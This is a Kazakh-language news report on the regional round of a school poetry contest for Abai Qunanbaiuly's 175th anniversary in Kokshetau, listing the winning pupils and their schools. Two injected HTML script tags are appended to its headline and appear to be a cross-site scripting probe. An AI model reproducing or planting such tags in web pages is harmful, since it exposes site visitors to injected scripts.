2020 жылдың 6-7 ақпан аралығында Абай Құнанбайұлының 175 жылдығына орай «Абай жаққан бір сәуле» Республикалық ақындар мүшәйрасының облыстық кезеңінің қорытындысы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
07.02.2020
2020 жылдың 6-7 ақпан күндері аралығында Көкшетау қаласы, дарынды балаларға арналған №3 облыстық мамандандырылған мектеп интернатының базасында 8-11 сынып оқушылары арасында республикалық Абай Құнанбайұлының 175 жылдығына орай ақындар мүшәйрасының облыстық кезеңінің байқауы өткізілді.
Ақындар мүшәйрасының негізгі мақсаты - қазақ халқының әдеби мұраларын дәріптеу, мектеп оқушыларының қазақ халқының бас ақыны болып табылатын Абай шығармаларына деген қызығушылығын арттыру.
Байқауға барлығы 12 ауданнан, Көкшетау қаласынан, дарынды балаларға арналған мамандандырылған мектеп-интернаттарынан барлығы 30 дан астам оқушы қатысты.
Байқау қорытындысы бойынша І дәрежелі дипломмен Аршалы ауданы, Сарыоба орта мектебінің 10 сынып оқушысы – Аманжол Жанарыс марапатталды.
ІІ дәрежелі дипломмен марапатталғандар:
- Кабдуллин Мадияр - Бурабай ауданы, Щучье қаласы №9 мектеп-гимназиясының 8 сынып оқушысы;
- Асалбек Мадина - Зеренді ауданы, Еленовка орта мектебінің 9 сынып оқушысы;
ІІІ дәрежелі дипломмен марапатталғандар:
- Қайратбек Құлия - Бурабай ауданы, Щучье қаласы №7 мектеп-лицейінің 11 сынып оқушысы;
- Конурбаева Зейнеп - Көкшетау қаласы, дарынды балаларға арналған №3 облыстық мамандандырылған мектеп-интернатының 11 сынып оқушысы;
Грамотамен марапатталғандар:
- Хайымхан Ақтілек - Бұланды ауданы, Қараөзек орта мектебінің 9 сынып оқушысы;
- Сағындық Ділназ - Жақсы ауданы, №1 Жақсы орта мектебінің 11 сынып оқушысы;
- Серік Нұрбек - Зеренді ауданы, М.Ғабдуллин атындағы жалпы білім беретін орта мектеп-гимназиясының 8 сынып оқушысы;
- Сәлетай Жеңіс - Шортанды ауданы, Степной орта мектебінің 10 сынып оқушысы;
- Қабжан Айнұр - Көкшетау қаласы, ІТ мектеп-лицейінің 8 сынып оқушысы.
Жүлдегерлерімізді шын жүректен құттықтаймыз! Әлі талай жетістіктеріңіздің куәсі болайық!